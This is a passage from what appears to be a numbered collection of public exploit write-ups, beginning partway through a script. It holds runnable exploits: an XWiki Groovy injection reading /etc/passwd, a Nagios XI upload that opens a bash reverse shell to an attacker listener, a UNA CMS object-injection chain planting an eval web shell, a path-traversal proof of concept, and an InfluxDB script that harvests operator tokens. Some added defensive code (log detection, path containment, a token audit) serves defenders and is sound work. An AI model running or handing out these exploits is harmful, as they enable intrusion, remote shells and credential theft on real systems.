    print("GitHub Exploit: https://github.com/a1baradi/Exploit/blob/main/CVE-2025-24893.py")
    print("="*80)

# Function to detect the target protocol (HTTP or HTTPS)
def detect_protocol(domain):
    https_url = f"https://{domain}"
    http_url = f"http://{domain}"
    try:
        response = requests.get(https_url, timeout=5, allow_redirects=True)
        if response.status_code < 400:
            print(f"[✔] Target supports HTTPS: {https_url}")
            return https_url
    except requests.exceptions.RequestException:
        print("[!] HTTPS not available, falling back to HTTP.")
    try:
        response = requests.get(http_url, timeout=5, allow_redirects=True)
        if response.status_code < 400:
            print(f"[✔] Target supports HTTP: {http_url}")
            return http_url
    except requests.exceptions.RequestException:
        print("[✖] Target is unreachable on both HTTP and HTTPS.")
        exit(1)

# Exploit function
def exploit(target_url):
    target_url = detect_protocol(target_url.replace("http://", "").replace("https://", "").strip())
    exploit_url = f"{target_url}/bin/get/Main/SolrSearch?media=rss&text=%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln(%22cat%20/etc/passwd%22.execute().text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d"
    try:
        print(f"[+] Sending request to: {exploit_url}")
        response = requests.get(exploit_url, timeout=10)
        # Check if the exploit was successful
        if response.status_code == 200 and "root:" in response.text:
            print("[✔] Exploit successful! Output received:")
            print(response.text)
        else:
            print(f"[✖] Exploit failed. Status code: {response.status_code}")
    except requests.exceptions.ConnectionError:
        print("[✖] Connection failed. Target may be down.")
    except requests.exceptions.Timeout:
        print("[✖] Request timed out. Target is slow or unresponsive.")
    except requests.exceptions.RequestException as e:
        print(f"[✖] Unexpected error: {e}")

# Main execution
if __name__ == "__main__":
    display_banner()
    target = input("[?] Enter the target URL (without http/https): ").strip()
    exploit(target)
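A detection-side counterpart to item 18, added here and not part of the exploit author's script: it parses web-server access-log lines in the combined format (the four sample lines are constructed; the third reproduces the SolrSearch request shape above with a harmless `println(1)` body) and flags requests to a SolrSearch path whose decoded `text` parameter contains a wiki-macro opener such as `}}}` or `{{groovy`. The log format and the marker list are assumptions; the decode-twice step is there so a double-encoded parameter does not slip past the check.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed access-log lines in the Apache/Nginx "combined" format. The third
# line has the SolrSearch request shape from the advisory with a harmless body.
SAMPLE_LOG = """\
10.0.0.5 - - [06/Apr/2025:10:01:02 +0000] "GET /bin/view/Main/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.5 - - [06/Apr/2025:10:01:09 +0000] "GET /bin/get/Main/SolrSearch?media=rss&text=release+notes HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.0.0.9 - - [06/Apr/2025:10:02:33 +0000] "GET /bin/get/Main/SolrSearch?media=rss&text=%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln(1)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d HTTP/1.1" 200 731 "-" "python-requests/2.31"
10.0.0.9 - - [06/Apr/2025:10:02:40 +0000] "POST /bin/view/Sandbox/ HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})')

# Macro openers that have no business inside a search string. "}}}" is the
# tell-tale prefix: it closes the verbatim block the parameter is wrapped in.
MACRO_MARKERS = ("}}}", "{{groovy", "{{async", "{{velocity", "{{python")


def is_solr_macro_injection(url):
    """True when a SolrSearch request carries a wiki-macro opener in `text`."""
    parts = urlsplit(url)
    if not parts.path.endswith("/SolrSearch"):
        return False
    params = parse_qs(parts.query, keep_blank_values=True)
    for value in params.get("text", []):
        # parse_qs decoded once already; a second unquote catches %257b-style double encoding.
        decoded = unquote(value).lower()
        if any(marker in decoded for marker in MACRO_MARKERS):
            return True
    return False


def scan_log(text):
    """Return one record per log line that matches the injection shape."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        if is_solr_macro_injection(m["url"]):
            hits.append({"ip": m["ip"], "ts": m["ts"],
                         "status": int(m["status"]), "url": m["url"]})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['ip']} status={hit['status']} {hit['url'][:80]}...")
```

A 200 on a flagged line means the server rendered the request, so on an unpatched version (15.10.10 and earlier per the header above) that line is the one to treat as a likely compromise rather than an attempt.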
19. # Exploit Title: Nagiosxi authenticated Remote Code Execution
# Date: 17/02/2024
# Exploit Author: Calil Khalil
# Vendor Homepage: https://www.nagios.com/products/nagios-xi/
# Version: Nagios Xi 5.6.6
# Tested on: Ubuntu
# CVE : CVE-2019-15949
#
# python3 exp.py -t https://<target>/ -b /<nagiosxi-path>/ -u user -p 'password' -lh <rev-ip> -lp <rev-port> -k (ignore cert)
#

import argparse
import re
import requests
import urllib3


class Nagiosxi():
    def __init__(self, target, parameter, username, password, lhost, lport, ignore_ssl):
        self.url = target
        self.parameter = parameter
        self.username = username
        self.password = password
        self.lhost = lhost
        self.lport = lport
        self.ignore_ssl = ignore_ssl
        self.login()

    def upload(self, session):
        print("Uploading Malicious Check Ping Plugin")
        upload_url = self.url + self.parameter + "/admin/monitoringplugins.php"
        upload_token = session.get(upload_url, verify=not self.ignore_ssl)
        nsp = re.findall('var nsp_str = "(.*)";', upload_token.text)
        print("Upload NSP Token: " + nsp[0])
        payload = "bash -c 'bash -i >& /dev/tcp/" + self.lhost + "/" + self.lport + " 0>&1'"
        file_data = {
            "upload": "1",
            "nsp": nsp[0],
            "MAX_FILE_SIZE": "20000000"
        }
        file_upload = {
            "uploadedfile": ("check_ping", payload, "application/octet-stream", {"Content-Disposition": "form-data"})
        }
        session.post(upload_url, data=file_data, files=file_upload, verify=not self.ignore_ssl)
        payload_url = self.url + self.parameter + "/includes/components/profile/profile.php?cmd=download"
        session.get(payload_url, verify=not self.ignore_ssl)

    def login(self):
        session = requests.Session()
        login_url = self.url + self.parameter + "/login.php"
        token = session.get(login_url, verify=not self.ignore_ssl)
        nsp = re.findall('name="nsp" value="(.*)">', token.text)
        print("Login NSP Token: " + nsp[0])
        post_data = {
            "nsp": nsp[0],
            "page": "auth",
            "debug": "",
            "pageopt": "login",
            "redirect": "",
            "username": self.username,
            "password": self.password,
            "loginButton": ""
        }
        login = session.post(login_url, data=post_data, verify=not self.ignore_ssl)
        if "Home Dashboard" in login.text:
            print("Logged in!")
        else:
            print("Unable to login!")
        self.upload(session)


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='CVE-2019-15949 Nagiosxi authenticated Remote Code Execution')
    parser.add_argument('-t', metavar='<Target base URL>', help='Example: -t http://nagios.url/', required=True)
    parser.add_argument('-b', metavar='<Base Directory>', help="Example: -b /nagiosxi/", required=True)
    parser.add_argument('-u', metavar='<Username>', help="Example: -u username", required=True)
    parser.add_argument('-p', metavar='<Password>', help="Example: -p 'password'", required=True)
    parser.add_argument('-lh', metavar='<Listener IP>', help="Example: -lh 127.0.0.1", required=True)
    parser.add_argument('-lp', metavar='<Listener Port>', help="Example: -lp 1337", required=True)
    parser.add_argument('-k', action='store_true', help="Ignore SSL certificate verification")
    args = parser.parse_args()
    urllib3.disable_warnings()
    try:
        print('CVE-2019-15949 Nagiosxi authenticated Remote Code Execution')
        Nagiosxi(args.t, args.b, args.u, args.p, args.lh, args.lp, args.k)
    except KeyboardInterrupt:
        print("\nBye Bye!")
        exit()
20. # Exploit Title: UNA CMS <= 14.0.0-RC4 (BxBaseMenuSetAclLevel.php) PHP Object Injection Vulnerability
# Author: Egidio Romano aka EgiX
# Software link.......: https://unacms.com

[-] Software Links:

https://unacms.com
https://github.com/unacms/una

[-] Affected Versions:

All versions from 9.0.0-RC1 to 14.0.0-RC4.

[-] Vulnerability Description:

The vulnerability is located in the /template/scripts/BxBaseMenuSetAclLevel.php script. Specifically, within the BxBaseMenuSetAclLevel::getCode() method. When calling this method, user input passed through the "profile_id" POST parameter is not properly sanitized before being used in a call to the unserialize() PHP function. This can be exploited by remote, unauthenticated attackers to inject arbitrary PHP objects into the application scope, allowing them to perform a variety of attacks, such as writing and executing arbitrary PHP code.

<?php

/*
    ------------------------------------------------------------------------------------
    UNA CMS <= 14.0.0-RC4 (BxBaseMenuSetAclLevel.php) PHP Object Injection Vulnerability
    ------------------------------------------------------------------------------------

    author..............: Egidio Romano aka EgiX
    mail................: n0b0d13s[at]gmail[dot]com
    software link.......: https://unacms.com

    +-------------------------------------------------------------------------+
    | This proof of concept code was written for educational purpose only.    |
    | Use it at your own risk. Author will be not responsible for any damage. |
    +-------------------------------------------------------------------------+

    [-] Vulnerability Description:

    The vulnerability is located in the /template/scripts/BxBaseMenuSetAclLevel.php script.
    Specifically, within the BxBaseMenuSetAclLevel::getCode() method. When calling this method,
    user input passed through the "profile_id" POST parameter is not properly sanitized before
    being used in a call to the unserialize() PHP function. This can be exploited by remote,
    unauthenticated attackers to inject arbitrary PHP objects into the application scope,
    allowing them to perform a variety of attacks, such as writing and executing arbitrary PHP code.

    [-] Original Advisory:

    https://karmainsecurity.com/KIS-2025-01
*/

set_time_limit(0);
error_reporting(E_ERROR);

print "\n+------------------------------------------------------------+";
print "\n| UNA CMS <= 14.0.0-RC4 PHP Object Injection Exploit by EgiX |";
print "\n+------------------------------------------------------------+\n";

if (!extension_loaded("curl")) die("\n[-] cURL extension required!\n\n");

if ($argc != 2)
{
    print "\nUsage......: php $argv[0] <URL>\n";
    print "\nExample....: php $argv[0] http://localhost/una/";
    print "\nExample....: php $argv[0] https://unacms.com/\n\n";
    die();
}

define('ON_APACHE', true);
define('SH_PATH', ON_APACHE ? './cache_public/sh.phtml' : './cache_public/sh.php');

class GuzzleHttp_Cookie_SetCookie
{
    private $data = ['Expires' => '', 'Value' => '<?php eval(base64_decode($_SERVER[\'HTTP_C\'])); ?>'];
}

class GuzzleHttp_Cookie_FileCookieJar
{
    private $cookies, $filename = SH_PATH, $storeSessionCookies = true;

    function __construct()
    {
        $this->cookies = [new GuzzleHttp_Cookie_SetCookie];
    }
}

$url = $argv[1];
$ch = curl_init();

$chain = serialize(new GuzzleHttp_Cookie_FileCookieJar);
$chain = str_replace('GuzzleHttp_Cookie_SetCookie', 'GuzzleHttp\Cookie\SetCookie', $chain);
$chain = str_replace('GuzzleHttp_Cookie_FileCookieJar', 'GuzzleHttp\Cookie\FileCookieJar', $chain);

curl_setopt($ch, CURLOPT_URL, "{$url}menu.php");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_HTTPHEADER, ["X-Requested-With: XMLHttpRequest"]);
curl_setopt($ch, CURLOPT_POSTFIELDS, "o=sys_set_acl_level&a=SetAclLevel&level_id=1&profile_id=" . urlencode($chain));

print "\n[+] Performing PHP Object Injection";
curl_exec($ch);
curl_close($ch);

print "\n[+] Launching shell\n";

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url . SH_PATH);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);

$phpcode = "print '____'; print shell_exec(base64_decode('%s')); print '____';";

while(1)
{
    print "\nuna-shell# ";
    if (($cmd = trim(fgets(STDIN))) == "exit") break;
    curl_setopt($ch, CURLOPT_HTTPHEADER, ["C: " . base64_encode(sprintf($phpcode, base64_encode($cmd)))]);
    preg_match('/____(.*)____/s', curl_exec($ch), $m) ? print $m[1] : die("\n[-] Exploit failed!\n\n");
}
21. # Exploit Title: Jasmin Ransomware - (Authenticated) Arbitrary File Download
# Google Dork: N/A
# Date: 22-03-2025
# Exploit Author: bRpsd cy[at]live.no
# Vendor Homepage: https://github.com/codesiddhant/Jasmin-Ransomware
# Software Link: https://github.com/codesiddhant/Jasmin-Ransomware
# Version: N/A
# Tested on: MacOS local xampp

Authentication can be easily bypassed due to SQL Injection as mentioned in: https://www.exploit-db.com/exploits/52091

Vulnerable file: Web Panel/download_file.php
Vulnerable parameter: file
Vulnerable code:

<?php
session_start();
if(!isset($_SESSION['username']) ){
    header("Location: login.php");
}
$file=$_GET['file'];
if(!empty($file)){
    // Define headers
    header("Cache-Control: public");
    header("Content-Description: File Transfer");
    header("Content-Disposition: attachment; filename=$file");
    header("Content-Type: text/encoded");
    header("Content-Transfer-Encoding: binary");
    // Read the file
    readfile($file);
    exit;
}else{
    echo 'The file does not exist.';
}
?>

Proof of concept:

http://localhost/Jasmin-Ransomware/Web Panel/download_file.php?file=database/db_conection.php

Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br, zstd
Connection: keep-alive
Cookie: PHPSESSID=88e519f73f9013f560ed3f0514015d8c
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1

GET: HTTP/1.1 200 OK
Date: Sat, 22 Mar 2025 09:42:09 GMT
Server: Apache/2.4.53 (Unix) OpenSSL/1.1.1o PHP/7.4.29 mod_perl/2.0.12 Perl/v5.34.1
X-Powered-By: PHP/7.4.29
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: public
Pragma: no-cache
Content-Description: File Transfer
Content-Disposition: attachment; filename=database/db_conection.php
Content-Transfer-Encoding: binary
Content-Length: 95
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/encoded;charset=UTF-8
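Items 14 and 21 are the same defect seen twice: a client-supplied name reaches a file read with no containment check (`readfile($file)` in the code above; the `squelette` parameter with percent-encoded `../` in item 14). The block below is an added example, not the projects' code, of the server-side resolution a download handler needs: decode the name, reject absolute paths, resolve with `realpath` and require the result to stay under the download root. The fixture directory it builds and the file names in it are constructed for the demonstration.

```python
import os
import tempfile
from pathlib import Path
from urllib.parse import unquote


class PathTraversalError(ValueError):
    """The requested name would resolve outside the download root."""


def resolve_download(root, requested):
    """Map a client-supplied name onto a file under `root` or raise.

    Percent-decoding runs twice so that "..%2f" and "..%252f" are both seen
    as "../" (item 14 encodes its slashes). Containment is decided on the
    realpath, which collapses ".." and symlinks, never on the raw string.
    """
    decoded = unquote(unquote(requested))
    if "\x00" in decoded:
        raise PathTraversalError("NUL byte in file name")
    if os.path.isabs(decoded) or decoded.startswith("\\"):
        raise PathTraversalError(f"absolute path rejected: {requested!r}")
    root_real = Path(os.path.realpath(root))
    candidate = Path(os.path.realpath(root_real / decoded))
    try:
        candidate.relative_to(root_real)
    except ValueError:
        raise PathTraversalError(f"{requested!r} escapes {root_real}") from None
    if not candidate.is_file():
        raise FileNotFoundError(decoded)
    return candidate


def serve_download(root, requested):
    """Hardened equivalent of readfile($_GET['file']): bytes of a contained file only."""
    return resolve_download(root, requested).read_bytes()


def rejects(root, requested):
    """True when the name is refused as traversal; False for served or merely missing files."""
    try:
        resolve_download(root, requested)
    except PathTraversalError:
        return True
    except FileNotFoundError:
        return False
    return False


def build_demo_root():
    """Constructed fixture: a download root with one report and a secret just outside it."""
    base = Path(tempfile.mkdtemp(prefix="dl-demo-"))
    root = base / "public"
    root.mkdir()
    (root / "report.txt").write_text("quarterly report\n")
    (base / "db_connection.php").write_text("<?php $pass = 'placeholder';\n")
    return root


if __name__ == "__main__":
    root = build_demo_root()
    print(serve_download(root, "report.txt").decode(), end="")
    for name in ("../db_connection.php", "..%2fdb_connection.php", "../" * 8 + "etc%2fpasswd"):
        print(name, "->", "rejected" if rejects(root, name) else "served")
```

The containment test is on the resolved path, which is why a symlink inside the root that points outside it is also refused; an allowlist of permitted names is stricter still and preferable when the set of downloadable files is known in advance.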
22. # Exploit Title: InfluxDB OSS Operator Privilege Escalation via BusinessLogic Flaw
# Date: 22/03/2024
# Exploit Author: Andrea Pasin (Xenom0rph97)
# Researcher Homepage: https://xenom0rph97.github.io/xeno/
# GitHub Exploit repo: https://github.com/XenoM0rph97/CVE-2024-30896
# Software Link: https://www.influxdata.com/products/influxdb/
# Version: 2.x <=> 2.7.11
# Tested on: InfluxDB OSS 2.x
# CVE: CVE-2024-30896
# CVSS Base Score: 9.1
# CVSS v3.1 Vector: AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

# CVE-2024-30896

## Summary

A business logic flaw in influxdb allows users who own a valid allAccess token to escalate their privileges at operator level by listing current authorization tokens.

## Scenario

Attacker might be a user who was granted access by an administrator via an allAccess token only within their organization. This user's permissions will allow full control over the organization but will still prevent them from interacting with other orgs.

## Impact

This vulnerability would allow a user to obtain unrestricted access to the influxdb instance. A similar condition might fully compromise Confidentiality, Integrity and Availability of data owned by users of different organizations. Additionally, since operator token has administrative permissions, Availability and Integrity of the entire influxdb instance might be compromised.

## Prerequisites/Limitations

1. Attacker must have a valid allAccess token
2. allAccess token must have been created in the same Org where an operator token resides (ex. same Org as Admin user)
3. Attacker must be able to interact with influxdb instance via CLI or APIs (influxClient)

## Steps to Reproduce

### Case 1: Exploitation via influxdb APIs:

*Python Version*: 3

*Requirements*: `influxdb_client==1.41.0`

*Script usage*

```
% python3 ./CVE-2024-30896.py -h
usage: CVE-2024-30896.py [-h] [-t TOKEN] [-e ENDPOINTURL] [-v [VERBOSE]] [-vv [VVERBOSE]]

optional arguments:
  -h, --help            show this help message and exit
  -t TOKEN, --token TOKEN
                        Custom or allAccess token to access influx DB instance
  -e ENDPOINTURL, --endpointUrl ENDPOINTURL
                        Endpoint Url of influxdb instance (ex. "https://myInfluxdbInstance:8086/")
  -v [VERBOSE], --verbose [VERBOSE]
                        Enable verbose logging - INFO
  -vv [VVERBOSE], --vverbose [VVERBOSE]
                        Enable verbose logging - DEBUG
```

### Case 2: Exploitation via influx CLI

1. Execute: `influx auth ls -t <allAccessToken> | grep write:/orgs`. This will list all current active operator tokens on the influxdb instance.

*Example*

```
# Using an allAccess token
influx auth ls -t U1OuqmFC{REDACTED} | grep U1OuqmFC{REDACTED}
0cc41c3b050e5000	U1OuqmFC{REDACTED}	admin	0cb9c92ee228b000	[read:orgs/87d0746948a3b3f5/authorizations write:orgs/87d0746948a3b3f5/authorizations read:orgs/87d0746948a3b3f5/buckets write:orgs/87d0746948a3b3f5/buckets read:orgs/87d0746948a3b3f5/dashboards write:orgs/87d0746948a3b3f5/dashboards read:/orgs/87d0746948a3b3f5 read:orgs/87d0746948a3b3f5/sources write:orgs/87d0746948a3b3f5/sources read:orgs/87d0746948a3b3f5/tasks write:orgs/87d0746948a3b3f5/tasks read:orgs/87d0746948a3b3f5/telegrafs write:orgs/87d0746948a3b3f5/telegrafs read:/users/0cb9c92ee228b000 write:/users/0cb9c92ee228b000 read:orgs/87d0746948a3b3f5/variables write:orgs/87d0746948a3b3f5/variables read:orgs/87d0746948a3b3f5/scrapers write:orgs/87d0746948a3b3f5/scrapers read:orgs/87d0746948a3b3f5/secrets write:orgs/87d0746948a3b3f5/secrets read:orgs/87d0746948a3b3f5/labels write:orgs/87d0746948a3b3f5/labels read:orgs/87d0746948a3b3f5/views write:orgs/87d0746948a3b3f5/views read:orgs/87d0746948a3b3f5/documents write:orgs/87d0746948a3b3f5/documents read:orgs/87d0746948a3b3f5/notificationRules write:orgs/87d0746948a3b3f5/notificationRules read:orgs/87d0746948a3b3f5/notificationEndpoints write:orgs/87d0746948a3b3f5/notificationEndpoints read:orgs/87d0746948a3b3f5/checks write:orgs/87d0746948a3b3f5/checks read:orgs/87d0746948a3b3f5/dbrp write:orgs/87d0746948a3b3f5/dbrp read:orgs/87d0746948a3b3f5/notebooks write:orgs/87d0746948a3b3f5/notebooks read:orgs/87d0746948a3b3f5/annotations write:orgs/87d0746948a3b3f5/annotations read:orgs/87d0746948a3b3f5/remotes write:orgs/87d0746948a3b3f5/remotes read:orgs/87d0746948a3b3f5/replications write:orgs/87d0746948a3b3f5/replications]

# Listing all available tokens passing allAccess token and retrieving only operator level tokens
influx auth ls -t U1OuqmFC{REDACTED} | grep write:/orgs
0cbb920e128e5000	gerKYLO0Ph_ibUk0y{REDACTED}	admin	0cb9c92ee228b000	[read:/authorizations write:/authorizations read:/buckets write:/buckets read:/dashboards write:/dashboards read:/orgs write:/orgs read:/sources write:/sources read:/tasks write:/tasks read:/telegrafs write:/telegrafs read:/users write:/users read:/variables write:/variables read:/scrapers write:/scrapers read:/secrets write:/secrets read:/labels write:/labels read:/views write:/views read:/documents write:/documents read:/notificationRules write:/notificationRules read:/notificationEndpoints write:/notificationEndpoints read:/checks write:/checks read:/dbrp write:/dbrp read:/notebooks write:/notebooks read:/annotations write:/annotations read:/remotes write:/remotes read:/replications write:/replications]
```

influxdb_client==1.41.0

import influxdb_client
import argparse
import logging
import sys

argParser = argparse.ArgumentParser()
argParser.add_argument("-t", "--token", type=str, help="Custom or allAccess token to access influx DB instance")
argParser.add_argument("-e", "--endpointUrl", type=str, help="Endpoint Url of influxdb instance (ex. \"https://myInfluxdbInstance:8086/\")")
argParser.add_argument("-v", "--verbose", type=bool, const=True, nargs='?', help="Enable verbose logging - INFO")
argParser.add_argument("-vv", "--vverbose", type=bool, const=True, nargs='?', help="Enable verbose logging - DEBUG")
args = argParser.parse_args()

# Using user retrieved values or default (hardcoded) ones
all_access_token = "<allAccessToken>"
influx_endpoint_url = "<influxdbEndpointUrl>"

# Defining some colors
red = "\033[31m"
yellow = "\033[93m"
purple = "\33[1;95m"
green = "\033[0;92m"
cyan = "\033[96m"
bold ="\033[1m"
endc = "\033[39m"

if args.vverbose == True:
    logging.basicConfig(level=logging.DEBUG)
elif args.verbose == True:
    logging.basicConfig(level=logging.INFO)
logger = logging.getLogger()

if args.token:
    token = args.token
else:
    logger.debug(f"{yellow}User did not set a token, using default one{endc}")
    token = all_access_token

if args.endpointUrl:
    endpointUrl = args.endpointUrl
else:
    logger.debug(f"{yellow}User did not set an endpoint Url for influxdb, using default one{endc}")
    endpointUrl = influx_endpoint_url

logger.info(f"{cyan}Connecting to influx DB instance{endc}")

# Connecting to influxdb instance
try:
    conn = influxdb_client.InfluxDBClient(
        url=endpointUrl,
        token=token,
        debug=False,
        verify_ssl=True
    )
    # Verify InfluxDB connection
    health = conn.ping()
    if not health:
        logger.error(f"{red}Unable to connect to db instance " + endpointUrl + f"{endc}")
        print(f"{red}Quitting execution...{endc}")
        sys.exit(1)
except Exception as e:
    logger.error(f"{red}Failed to connect to db instance: " + endpointUrl + " Error: " + str(e) + f"{endc}")
    print(f"{red}Quitting execution...{endc}")
    sys.exit(1)

# Retrieving all current auths
logger.debug(f"{yellow}Retrieving all auth tokens{endc}")
print(f"{cyan}Enumerating current authorizations...{endc}")
try:
    auths = conn.authorizations_api().find_authorizations()
except Exception as e:
    logger.error(f"{red}Unable to retrieve authorizations. ERR: " + str(e) + f"{endc}")
    print(f"{red}Unable to retrieve authorizations. Quitting...{endc}")
    sys.exit(1)

if not auths:
    print(f"{cyan}No Authorization tokens found on the instance{endc}")
    sys.exit(1)

print(f"{cyan}{str(len(auths))} tokens found on the instance{endc}\n")

# Extracting operator token -> Parsing permissions to look for ("org = None" and "authType = write/auths"), not 100% efficiency -> TO OPTIMIZE
logger.debug(f"{yellow}Parsing auth permissions to retrieve operator tokens{endc}")
print(f"{cyan}Enumerating all operator tokens:{endc}")
op_tokens = []

# In order to understand if a token is of type "operator" we need to enumerate all permissions and look for "write/auths" on org 'None' -> Unrestricted access
try:
    for auth in auths:
        if auth.permissions:
            for perm in auth.permissions:
                if perm.action == "write" and perm.resource.org == None and perm.resource.type == "authorizations":
                    op_tokens.append(auth.token)
except Exception as e:
    logger.error(f"{red}Unable to parse permissions on found authorizations. ERR: " + str(e) + f"{endc}")
    print(f"{red}Unable to parse permissions on found authorizations. Quitting execution...{endc}")
    sys.exit(1)

logger.info(f"{cyan}Printing all operator auth tokens{endc}")
print(f"{cyan}{str(len(op_tokens))} operator tokens found.\n\nListing all operator tokens:\n{endc}")
for op_t in op_tokens:
    print(f"{green}{op_t}{endc}")
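The permission strings in the `influx auth ls` output above are what separate an operator token (`write:/authorizations`, no org segment) from an org-scoped one (`write:orgs/<id>/authorizations`). The audit below is an added example, not the researcher's script: it classifies tokens from that string form and reports each org where an operator token sits beside org-scoped tokens, which is prerequisite 2 of the advisory, so an administrator can see which operator tokens to rotate or move before upgrading. The sample records are constructed to match the quoted output, with placeholder token values, and the `org_id` field stands for the org an authorization was created in.

```python
# Constructed sample modelled on the `influx auth ls` output quoted above: an
# allAccess token and an operator token created in the same org, plus a
# read-only token in a second org. Token strings are placeholders, not real.
SAMPLE_AUTHS = [
    {"id": "0cc41c3b050e5000", "org_id": "87d0746948a3b3f5", "user": "admin",
     "token": "ALLACCESS-PLACEHOLDER-TOKEN",
     "permissions": [
         "read:orgs/87d0746948a3b3f5/authorizations", "write:orgs/87d0746948a3b3f5/authorizations",
         "read:orgs/87d0746948a3b3f5/buckets", "write:orgs/87d0746948a3b3f5/buckets",
         "read:/orgs/87d0746948a3b3f5",
         "read:/users/0cb9c92ee228b000", "write:/users/0cb9c92ee228b000"]},
    {"id": "0cbb920e128e5000", "org_id": "87d0746948a3b3f5", "user": "admin",
     "token": "OPERATOR-PLACEHOLDER-TOKEN",
     "permissions": [
         "read:/authorizations", "write:/authorizations",
         "read:/buckets", "write:/buckets", "read:/orgs", "write:/orgs"]},
    {"id": "0cd0ffee0badc0de", "org_id": "a1b2c3d4e5f60718", "user": "reader",
     "token": "READONLY-PLACEHOLDER-TOKEN",
     "permissions": ["read:orgs/a1b2c3d4e5f60718/buckets"]},
]


def parse_permission(perm):
    """Split one permission string into action, org scope, resource type and resource id.

    Two shapes appear in the CLI output:
      write:orgs/<orgID>/buckets      -> scoped to one org (allAccess / custom tokens)
      write:/orgs, write:/buckets     -> no org scope at all (operator tokens)
      read:/users/<id>                -> a single resource by id, no org scope
    """
    action, sep, resource = perm.partition(":")
    if not sep or action not in ("read", "write"):
        raise ValueError(f"unrecognised permission: {perm!r}")
    if resource.startswith("orgs/") and resource.count("/") == 2:
        _, org, rtype = resource.split("/")
        return {"action": action, "org": org, "type": rtype, "id": None}
    if resource.startswith("/"):
        parts = resource[1:].split("/")
        return {"action": action, "org": None, "type": parts[0],
                "id": parts[1] if len(parts) > 1 else None}
    raise ValueError(f"unrecognised permission: {perm!r}")


def is_operator(auth):
    """Operator tokens hold write on `authorizations` with neither org nor resource id."""
    return any(p["action"] == "write" and p["type"] == "authorizations"
               and p["org"] is None and p["id"] is None
               for p in map(parse_permission, auth["permissions"]))


def redact(token):
    """Print tokens the way the advisory does: a short prefix plus {REDACTED}."""
    return token[:8] + "{REDACTED}"


def audit(auths):
    """One finding per org that holds both an operator token and org-scoped tokens."""
    by_org = {}
    for auth in auths:
        bucket = by_org.setdefault(auth["org_id"], {"operator": [], "scoped": []})
        bucket["operator" if is_operator(auth) else "scoped"].append(auth["id"])
    findings = []
    for org_id, groups in sorted(by_org.items()):
        if groups["operator"] and groups["scoped"]:
            findings.append({"org_id": org_id,
                             "operator_ids": sorted(groups["operator"]),
                             "exposed_to": sorted(groups["scoped"])})
    return findings


if __name__ == "__main__":
    for auth in SAMPLE_AUTHS:
        kind = "operator" if is_operator(auth) else "org-scoped"
        print(auth["id"], redact(auth["token"]), auth["org_id"], kind)
    for f in audit(SAMPLE_AUTHS):
        print(f"org {f['org_id']}: operator token(s) {f['operator_ids']} "
              f"share the org with non-operator token(s) {f['exposed_to']}")
```

Feeding it real data means building the same dicts from the `influx auth ls` columns (ID, token, user, user ID, permissions) or from the client library's authorization objects; the classification rule is the same one the script above applies to `perm.resource.org` and `perm.resource.type`.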
  23. # Exploit Title: Sony XAV-AX5500 Firmware Update Validation Remote Code Execution
# Date: 11-Feb-2025
# Exploit Author: lkushinada
# Vendor Homepage: https://www.sony.com/et/electronics/in-car-receivers-players/xav-ax5500
# Software Link: https://archive.org/details/xav-ax-5500-v-113
# Version: 1.13
# Tested on: Sony XAV-AX5500
# CVE : CVE-2024-23922

# From NIST CVE Details:
# ====
# This vulnerability allows physically present attackers to execute arbitrary code on affected
# installations of Sony XAV-AX5500 devices. Authentication is not required to exploit this
# vulnerability. The specific flaw exists within the handling of software updates. The issue
# results from the lack of proper validation of software update packages. An attacker can leverage
# this vulnerability to execute code in the context of the device.
# Was ZDI-CAN-22939
# ====
#
# Summary
# Sony's firmware validation for a number of their XAV-AX products relies on symmetric cryptography,
# obscurity of their package format, and a weird checksum method instead of any real firmware
# signing mechanism. As such, this can be exploited to craft updates which bypass firmware validation
# and allow a USB-based attacker to obtain RCE on the infotainment unit.
# What's not mentioned in the CVE advisories is that this method works on the majority of Sony's
# infotainment units and products which use a similar chipset or firmware package format. Tested
# to work on most firmware versions prior to v2.00.
#
# Threat Model
# An attacker with physical access to an automotive media unit can typically utilize other methods
# to achieve a malicious outcome. The reason to investigate the firmware to the extent in this post
# is academic, exploratory, and cautionary, i.e. what other systems are protected in a similar
# manner? If they are, how trivial is it to bypass?
#
# Disclaimer
# The information in this article is for educational purposes only.
# Tampering with an automotive system comes with risks which, if you don't understand, you should
# not be undertaking.
# THE AUTHORS DISCLAIM ANY AND ALL RESPONSIBILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES ARISING
# FROM THE USE OF ANYTHING IN THIS DOCUMENT.
#
# The Unit
# ## Processors
# - DAC
# - System Management Controller (SMC)
# - Applications Processor
# - Display Processor
